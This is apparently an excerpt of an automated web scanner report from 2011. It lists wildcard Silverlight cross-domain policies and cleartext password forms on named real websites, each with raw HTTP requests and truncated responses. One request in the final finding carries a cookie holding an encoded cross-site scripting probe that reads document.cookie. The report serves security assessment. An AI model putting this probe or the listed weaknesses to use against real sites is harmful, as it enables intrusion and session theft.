Host:   http://ec.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Expires: Sun, 01 May 2011 12:29:09 GMT
Date: Sun, 24 Apr 2011 12:29:09 GMT
Content-Type: text/xml
Content-Length: 312
Allow: GET
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.9. http://equifaxps.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: equifaxps.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:19 GMT
Server: Omniture DC/2.0.0
xserver: www80
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.10. http://metrics.citibank.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.citibank.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:10 GMT
Server: Omniture DC/2.0.0
xserver: www55
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.11. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:53:07 GMT
Server: Omniture DC/2.0.0
xserver: www10
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.12. http://o.swisscom.ch/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.swisscom.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:52 GMT
Server: Omniture DC/2.0.0
xserver: www264
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.13. http://omni.pcworld.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.pcworld.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.pcworld.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:50:55 GMT
Server: Omniture DC/2.0.0
xserver: www252
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.14. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:45:42 GMT
Server: Omniture DC/2.0.0
xserver: www373
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.15. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 335
Date: Sun, 24 Apr 2011 16:35:03 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.16. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 00:34:42 GMT
Expires: Thu, 21 Apr 2011 00:33:17 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 43343
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.17. http://s1.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 15:20:15 GMT
Expires: Mon, 25 Apr 2011 15:20:15 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.18. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:49:06 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 01 May 2011 19:49:06 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

8.19. http://smetrics.freecreditreport.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smetrics.freecreditreport.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: smetrics.freecreditreport.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:03 GMT
Server: Omniture DC/2.0.0
xserver: www65
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.20. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Tue, 26 Apr 2011 00:56:06 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.21. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

8.22. http://switch.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.23. http://transunioninteractive.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://transunioninteractive.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: transunioninteractive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:46 GMT
Server: Omniture DC/2.0.0
xserver: www358
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.24. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 24 Apr 2011 12:43:14 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8.25. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 24 Apr 2011 12:43:32 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8.26. http://www.silverlight.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.silverlight.net

Response

HTTP/1.1 200 OK
Content-Length: 1046
Content-Type: text/xml
Last-Modified: Thu, 10 Feb 2011 22:21:06 GMT
Accept-Ranges: bytes
ETag: "f9714acf70c9cb1:0",""
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:58 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="http://timheuer.com"/>
...[SNIP]...
<domain uri="http://www.timheuer.com"/>
...[SNIP]...
<domain uri="http://dasp.timheuer.com"/>
...[SNIP]...
<domain uri="https://www.timheuer.com"/>
...[SNIP]...
<domain uri="http://www.10rem.net"/>
...[SNIP]...
<domain uri="http://10rem.net"/>
...[SNIP]...
<domain uri="http://silverlight.net"/>
...[SNIP]...
<domain uri="http://www.asp.net"/>
...[SNIP]...
<domain uri="http://asp.net"/>
...[SNIP]...
<domain uri="http://www.windowsclient.net"/>
...[SNIP]...
<domain uri="http://windowsclient.net"/>
...[SNIP]...

9. Cleartext submission of password  previous  next
There are 17 instances of this issue:


9.1. http://controlcase.com/change_password.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://controlcase.com
Path:   /change_password.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /change_password.php HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664740.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.15.10.1303664485

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:14:45 GMT
Server: Apache/2.0.55 (Win32)
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form name="change_passwd" method='post' action='change_password.php' onSubmit="javascript:document.change_passwd.todo.value='change'">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...
<td><input name="new_password" type="password" id="PW__pass_new" size="50" /></td>
...[SNIP]...
<td><input name="confirm_password" type="password" id="PW__pass_confirm" size="50" /></td>
...[SNIP]...

9.2. http://controlcase.com/logon_page.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://controlcase.com
Path:   /logon_page.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /logon_page.php HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485; PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:12:15 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form method='post' action='process_form_PW.php' name="login_frm">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...

9.3. http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/MonitoringTrial.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /icomee-regs/trial/MonitoringTrial.jsp?m=2 HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F4978EDED768B0F757D9681D37B31DEC; Path=/icomee-regs
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 00:38:30 GMT
Content-Length: 20313


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...
<!-- imageready slices (echomail.psd) -->
<form name="QuickTrialForm" method="post" action="/icomee-regs/trial/QuickTrial.do;jsessionid=F4978EDED768B0F757D9681D37B31DEC">
<table width="1000" border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width="240" align="left"><input type="password" name="password" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...
<td align="left"><input type="password" name="confPassword" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...

9.4. http://engine03.echomail.com/icomee-regs/trial/QuickTrial.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/QuickTrial.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /icomee-regs/trial/QuickTrial.jsp HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
Referer: http://www.echomail.com/pricing/pricing_sm.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FEEE9E501044CA2B9A9053B24A6194EF; __utmz=20441063.1303692234.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20441063.944278103.1303692234.1303692234.1303692234.1; __utmc=20441063; __utmb=20441063.4.10.1303692234

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 00:44:21 GMT
Content-Length: 21295


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...
<!-- imageready slices (echomail.psd) -->
<form name="QuickTrialForm" method="post" action="/icomee-regs/trial/QuickTrial.do">
<table width="1000" border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width="240" align="left"><input type="password" name="password" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...
<td align="left"><input type="password" name="confPassword" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...

9.5. http://www.dictof.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...
<div class="LoginIndex"> <form action="/login/" method="post"> <!--<p class="error">
...[SNIP]...
<dd><input name="password" type="password" id="password" value=""/></dd>
...[SNIP]...

9.6. http://www.dictof.com/login/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login/ HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.1.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303661140

